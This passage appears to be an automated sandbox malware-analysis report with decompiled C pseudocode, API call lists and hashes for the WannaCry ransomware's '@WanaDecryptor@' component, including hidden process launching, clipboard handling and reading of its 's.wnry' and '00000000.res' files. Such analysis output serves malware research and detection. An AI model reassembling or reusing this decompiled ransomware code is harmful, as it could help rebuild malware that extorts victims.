                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                  • fopen.MSVCRT ref: 0040C46B
                                  • fwrite.MSVCRT ref: 0040C489
                                  • fclose.MSVCRT ref: 0040C48F
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823fclosefopenfwrite
                                  • String ID:
                                  • API String ID: 1132507536-0
                                  • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                  • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
                                  				struct _STARTUPINFOA _v68;
                                  				struct _PROCESS_INFORMATION _v84;
                                  				void* _t21;
                                  				long _t25;
                                  				DWORD* _t30;
                                  
                                  				_v68.cb = 0x44;
                                  				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
                                  				_v84.hThread = _t21;
                                  				_v84.dwProcessId = _t21;
                                  				_v84.dwThreadId = _t21;
                                  				_v84.hProcess = 0;
                                  				_v68.dwFlags = 1;
                                  				_v68.wShowWindow = 0;
                                  				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84) == 0) {
                                  					return 0;
                                  				} else {
                                  					_t25 = _a8;
                                  					if(_t25 != 0) {
                                  						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
                                  							TerminateProcess(_v84.hProcess, 0xffffffff);
                                  						}
                                  						_t30 = _a12;
                                  						if(_t30 != 0) {
                                  							GetExitCodeProcess(_v84.hProcess, _t30);
                                  						}
                                  					}
                                  					CloseHandle(_v84);
                                  					CloseHandle(_v84.hThread);
                                  					return 1;
                                  				}
                                  			}









                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                  • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                  • String ID: D
                                  • API String ID: 786732093-2746444292
                                  • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                  • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407C30(void* __ecx) {
                                  				int _t9;
                                  				void* _t15;
                                  				void* _t22;
                                  				signed int _t25;
                                  				signed int _t26;
                                  				void* _t39;
                                  				void* _t40;
                                  
                                  				_t39 = __ecx;
                                  				_t9 = OpenClipboard( *(__ecx + 0x20));
                                  				if(_t9 == 0) {
                                  					return _t9;
                                  				} else {
                                  					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
                                  					if(_t22 != 0) {
                                  						EmptyClipboard();
                                  						_t40 =  *(_t39 + 0x508);
                                  						_t15 = GlobalLock(_t22);
                                  						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
                                  						_t26 = _t25 >> 2;
                                  						memcpy(_t15, _t40, _t26 << 2);
                                  						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
                                  						GlobalUnlock(_t22);
                                  						SetClipboardData(1, _t22);
                                  						return CloseClipboard();
                                  					}
                                  					return CloseClipboard();
                                  				}
                                  			}











                                  APIs
                                  • OpenClipboard.USER32(?), ref: 00407C38
                                  • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                  • CloseClipboard.USER32 ref: 00407C5B
                                  • EmptyClipboard.USER32 ref: 00407C66
                                  • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                  • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                  • CloseClipboard.USER32 ref: 00407CA1
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                  • String ID:
                                  • API String ID: 142981918-0
                                  • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                  • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 2613176527-0
                                  • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                  • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E00407F80(void* __ecx) {
                                  				struct _IO_FILE* _t24;
                                  				void* _t30;
                                  				void* _t37;
                                  				void* _t38;
                                  				signed int _t45;
                                  				signed int _t48;
                                  				signed int _t51;
                                  				unsigned int _t53;
                                  				signed int _t54;
                                  				void* _t66;
                                  				struct _IO_FILE* _t76;
                                  				void* _t77;
                                  				void* _t78;
                                  				void* _t79;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t84;
                                  				void* _t85;
                                  
                                  				_t79 = __ecx;
                                  				 *((char*)(_t81 + 0xc)) = 0;
                                  				memset(_t81 + 0xd, 0, 0xc << 2);
                                  				_t82 = _t81 + 0xc;
                                  				asm("stosb");
                                  				 *((intOrPtr*)(_t82 + 0x40)) = 0;
                                  				memset(_t82 + 0x44, 0, 0x21 << 2);
                                  				_t24 = fopen("00000000.res", "rb");
                                  				_t76 = _t24;
                                  				_t84 = _t82 + 0x14;
                                  				_t89 = _t76;
                                  				if(_t76 != 0) {
                                  					fread(_t84 + 0x48, 0x88, 1, _t76);
                                  					fclose(_t76);
                                  					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
                                  					_t45 = _t84 + 0x60;
                                  					_push(_t84 + 0x2c);
                                  					_t66 = _t79 + 0x5f0;
                                  					_push("+++");
                                  					_push(_t45);
                                  					_push(_t66);
                                  					_t30 = E0040C4F0(_t38, _t45, _t89);
                                  					_t85 = _t84 + 0x30;
                                  					_t77 = _t30;
                                  					E0040C670();
                                  					_t90 = _t77 - 0xffffffff;
                                  					if(_t77 == 0xffffffff) {
                                  						_push(_t85 + 0xc);
                                  						_push("+++");
                                  						_push(_t85 + 0x40);
                                  						_push(_t66);
                                  						_t37 = E0040C4F0(_t38, _t45, _t90);
                                  						_t85 = _t85 + 0x10;
                                  						_t77 = _t37;
                                  					}
                                  					_t24 = E0040C670();
                                  					if(_t77 == 1) {
                                  						_t24 = 0;
                                  						asm("repne scasb");
                                  						_t48 =  !(_t45 | 0xffffffff) - 1;
                                  						if(_t48 >= 0x1e) {
                                  							asm("repne scasb");
                                  							_t51 =  !(_t48 | 0xffffffff) - 1;
                                  							if(_t51 < 0x32) {
                                  								asm("repne scasb");
                                  								_t53 =  !(_t51 | 0xffffffff);
                                  								_t78 = _t85 + 0xc - _t53;
                                  								_t54 = _t53 >> 2;
                                  								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
                                  								return E00401A10(_t79 + 0x50c, 0);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t24;
                                  			}






















                                  APIs
                                  • fopen.MSVCRT ref: 00407FBD
                                  • fread.MSVCRT ref: 00407FDD
                                  • fclose.MSVCRT ref: 00407FE4
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                    • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy$fclosefopenfread
                                  • String ID: +++$00000000.res$s.wnry
                                  • API String ID: 3363958884-869915597
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00403860(void* __ecx) {
                                  				int _t6;
                                  				long _t7;
                                  				void* _t9;
                                  				void* _t14;
                                  
                                  				_t14 = __ecx;
                                  				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
                                  				_push(0);
                                  				if(_t6 != 0xffffffff) {
                                  					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
                                  					if(_t7 != 0) {
                                  						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
                                  						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
                                  						 *(_t14 + 0xf4) = _t9;
                                  						return _t9;
                                  					}
                                  					return _t7;
                                  				} else {
                                  					_push(0);
                                  					_push("Please select a host to decrypt.");
                                  					L00412CC8();
                                  					return _t6;
                                  				}
                                  			}








                                  APIs
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                  • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                  • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                  Strings
                                  • Please select a host to decrypt., xrefs: 00403885
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1200CreateThread
                                  • String ID: Please select a host to decrypt.
                                  • API String ID: 3616405048-3459725315
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E004044C0(void* __ecx, long _a4) {
                                  				struct tagLOGFONTA _v72;
                                  				long _t10;
                                  				struct HFONT__* _t13;
                                  				struct HWND__* _t15;
                                  				void* _t21;
                                  
                                  				_t10 = _a4;
                                  				_t21 = __ecx;
                                  				if(_t10 != 0) {
                                  					L2:
                                  					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
                                  					_v72.lfUnderline = 1;
                                  					_t13 = CreateFontIndirectA( &_v72);
                                  					_push(_t13);
                                  					L00412D5E();
                                  					 *((char*)(_t21 + 0x58)) = 1;
                                  					return _t13;
                                  				}
                                  				_t15 = GetParent( *(__ecx + 0x20));
                                  				_push(_t15);
                                  				L00412DAC();
                                  				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
                                  				_push(_t10);
                                  				L00412DE2();
                                  				if(_t10 != 0) {
                                  					goto L2;
                                  				}
                                  				return _t10;
                                  			}









                                  APIs
                                  • GetParent.USER32(?), ref: 004044D2
                                  • #2864.MFC42(00000000), ref: 004044D9
                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                  • #2860.MFC42(00000000), ref: 004044EF
                                  • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                  • CreateFontIndirectA.GDI32(?), ref: 00404513
                                  • #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 2724197214-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E0040C060(void* __ecx, void* __eflags) {
                                  				void* _t35;
                                  				int _t45;
                                  				struct HWND__* _t56;
                                  				signed int _t58;
                                  				int _t59;
                                  				intOrPtr* _t65;
                                  				intOrPtr* _t69;
                                  				intOrPtr* _t70;
                                  				intOrPtr* _t73;
                                  				intOrPtr* _t75;
                                  				struct HWND__* _t87;
                                  				intOrPtr _t92;
                                  				void* _t93;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004142BB);
                                  				 *[fs:0x0] = _t92;
                                  				E00413060(0x2408, __ecx,  *[fs:0x0]);
                                  				_push(_t58);
                                  				E0040DBB0(_t92 + 0x18, 0x1000);
                                  				 *(_t92 + 0x241c) = 0;
                                  				_push(_t92 + 0x14);
                                  				_t59 = _t58 | 0xffffffff;
                                  				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
                                  				_t93 = _t92 + 0x10;
                                  				if(_t35 == 0) {
                                  					_t87 =  *(_t93 + 0x2430);
                                  					if(_t87 != 0) {
                                  						SendMessageA(_t87, 0x4e20, 0, 0);
                                  					}
                                  					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
                                  					_t65 =  *0x422210; // 0xb7d178
                                  					_push(0);
                                  					_push(E0040DD40(_t93 + 0x1c));
                                  					_push(E0040DD30(_t93 + 0x20));
                                  					_push(7);
                                  					if( *((intOrPtr*)( *_t65 + 0x18))() >= 0) {
                                  						if(_t87 != 0) {
                                  							SendMessageA(_t87, 0x4e21, 0, 0);
                                  						}
                                  						_t69 =  *0x422210; // 0xb7d178
                                  						_push(_t93 + 0x10);
                                  						_push(_t93 + 0x102c);
                                  						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
                                  						_push(_t93 + 0x17);
                                  						if( *((intOrPtr*)( *_t69 + 0x1c))() >= 0) {
                                  							if( *((char*)(_t93 + 0xf)) == 7) {
                                  								_t59 = 0;
                                  							}
                                  							if(_t87 != 0) {
                                  								SendMessageA(_t87, 0x4e22, _t59, 0);
                                  							}
                                  							_t70 =  *0x422210; // 0xb7d178
                                  							 *((intOrPtr*)( *_t70 + 0xc))();
                                  							 *(_t93 + 0x241c) = 0xffffffff;
                                  							goto L21;
                                  						} else {
                                  							if(_t87 != 0) {
                                  								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
                                  							}
                                  							_t73 =  *0x422210; // 0xb7d178
                                  							 *((intOrPtr*)( *_t73 + 0xc))();
                                  							 *(_t93 + 0x241c) = 0xffffffff;
                                  							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                  						}
                                  					} else {
                                  						if(_t87 != 0) {
                                  							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
                                  						}
                                  						_t75 =  *0x422210; // 0xb7d178
                                  						 *((intOrPtr*)( *_t75 + 0xc))();
                                  						 *(_t93 + 0x241c) = 0xffffffff;
                                  						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                  					}
                                  				} else {
                                  					_t56 =  *(_t93 + 0x2430);
                                  					if(_t56 != 0) {
                                  						SendMessageA(_t56, 0x4e20, _t59, 0);
                                  					}
                                  					 *(_t93 + 0x241c) = _t59;
                                  					L21:
                                  					E0040DBF0(_t93 + 0x14);
                                  					_t45 = _t59;
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
                                  				return _t45;
                                  			}

















                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823
                                  • String ID:
                                  • API String ID: 3019263841-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
                                  				signed int _v0;
                                  				char _v4;
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				signed int _t29;
                                  				intOrPtr _t31;
                                  				long _t36;
                                  				intOrPtr _t38;
                                  				intOrPtr* _t41;
                                  				struct HWND__* _t47;
                                  				intOrPtr _t48;
                                  				long _t53;
                                  				struct HWND__* _t58;
                                  				signed int _t60;
                                  				intOrPtr* _t67;
                                  				signed int _t68;
                                  
                                  				_t67 = __ecx;
                                  				L00412FE6();
                                  				_t68 = __eax;
                                  				if((__eax & 0x00008000) != 0) {
                                  					_push( &_v8);
                                  					_push( &_v4);
                                  					L00412FFE();
                                  					if(_a4 == 0) {
                                  						_t60 = _v0;
                                  						_t41 = _v16;
                                  					} else {
                                  						_t58 =  *(__ecx + 0x20);
                                  						_t36 = SendMessageA(_t58, 0x408, 0, 0);
                                  						_t41 = _v16;
                                  						_t53 = _t36;
                                  						if(_t53 == _t41) {
                                  							_t38 =  *((intOrPtr*)(_t67 + 0x68));
                                  							_t58 =  *(_t67 + 0x6c);
                                  							if(_t53 - _t38 < _t58) {
                                  								_t53 = _t58 + _t38;
                                  							}
                                  						}
                                  						asm("cdq");
                                  						_t60 = (_v0 ^ _t58) - _t58 + _t53;
                                  					}
                                  					_t47 =  *(_t67 + 0x6c);
                                  					_t29 = _t47 + _t41;
                                  					if(_t60 <= _t29) {
                                  						if(_t60 >= _t41) {
                                  							InvalidateRect( *(_t67 + 0x20), 0, 1);
                                  						}
                                  					} else {
                                  						_t60 = _t60 + _v12 - _t47 - _t41;
                                  						if(_t60 > _t29) {
                                  							_t60 = _t29;
                                  						}
                                  						_push(0);
                                  						if((_t68 & 0x00004000) == 0) {
                                  							_push(0x4000);
                                  							_push(0);
                                  							L00412DDC();
                                  						} else {
                                  							_push(0);
                                  							_push(0x4000);
                                  							L00412DDC();
                                  						}
                                  					}
                                  					_t48 = _v12;
                                  					_t31 = _t60 -  *(_t67 + 0x6c);
                                  					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
                                  					if(_t31 < _t48) {
                                  						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
                                  					}
                                  					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
                                  					return 1;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}





















                                  APIs
                                  • #3797.MFC42 ref: 00409C27
                                  • #6734.MFC42(?,?), ref: 00409C4E
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                  • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3797#4284#6734MessageSend
                                  • String ID:
                                  • API String ID: 1776784669-0
                                  • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                  • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				void* _v4;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v24;
                                  				void* __ebx;
                                  				intOrPtr* _t21;
                                  				intOrPtr* _t23;
                                  				intOrPtr _t25;
                                  				intOrPtr _t26;
                                  				intOrPtr* _t33;
                                  				signed int _t42;
                                  				unsigned int _t44;
                                  				signed int _t45;
                                  				void* _t53;
                                  				intOrPtr _t65;
                                  				void* _t67;
                                  				intOrPtr _t68;
                                  				void* _t69;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041438B);
                                  				_t21 =  *[fs:0x0];
                                  				_push(_t21);
                                  				 *[fs:0x0] = _t68;
                                  				_push(__ecx);
                                  				_push(0x244);
                                  				L00412CEC();
                                  				_t33 = _t21;
                                  				_t69 = _t68 + 4;
                                  				_v16 = _t33;
                                  				_t53 = 0;
                                  				_v4 = 0;
                                  				if(_t33 == 0) {
                                  					_t33 = 0;
                                  				} else {
                                  					_t65 = _a16;
                                  					 *_t33 = 0;
                                  					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
                                  					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
                                  					 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                  					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
                                  					if(_t65 != 0) {
                                  						asm("repne scasb");
                                  						_t42 =  !(__ecx | 0xffffffff);
                                  						_push(_t42);
                                  						L00412CEC();
                                  						 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                  						asm("repne scasb");
                                  						_t44 =  !(_t42 | 0xffffffff);
                                  						_t67 = _t65 - _t44;
                                  						_t45 = _t44 >> 2;
                                  						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
                                  						_t69 = _t69 + 0x1c;
                                  						_t53 = 0;
                                  					}
                                  				}
                                  				_push(_a12);
                                  				_push(_a8);
                                  				_push(_a4);
                                  				_v4 = 0xffffffff;
                                  				_t23 = E00411C00(_t33);
                                  				 *0x4220dc = _t23;
                                  				if(_t23 == _t53) {
                                  					_push(8);
                                  					L00412CEC();
                                  					 *_t23 = 1;
                                  					 *((intOrPtr*)(_t23 + 4)) = _t33;
                                  					 *[fs:0x0] = _v24;
                                  					return _t23;
                                  				} else {
                                  					if(_t33 != _t53) {
                                  						_t25 =  *((intOrPtr*)(_t33 + 0x138));
                                  						if(_t25 != _t53) {
                                  							_push(_t25);
                                  							L00412C98();
                                  							_t69 = _t69 + 4;
                                  						}
                                  						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
                                  						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
                                  						if(_t26 != _t53) {
                                  							_push(_t26);
                                  							L00412C98();
                                  							_t69 = _t69 + 4;
                                  						}
                                  						_push(_t33);
                                  						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
                                  						L00412C98();
                                  						_t69 = _t69 + 4;
                                  					}
                                  					 *[fs:0x0] = _v24;
                                  					return 0;
                                  				}
                                  			}





















                                  APIs
                                  • #823.MFC42(00000244,?,0019FA30,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                  • #823.MFC42(?,?,?), ref: 00412849
                                  • #825.MFC42(?), ref: 004128B5
                                  • #825.MFC42(?), ref: 004128CE
                                  • #825.MFC42(00000000), ref: 004128DD
                                  • #823.MFC42(00000008), ref: 004128FA
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
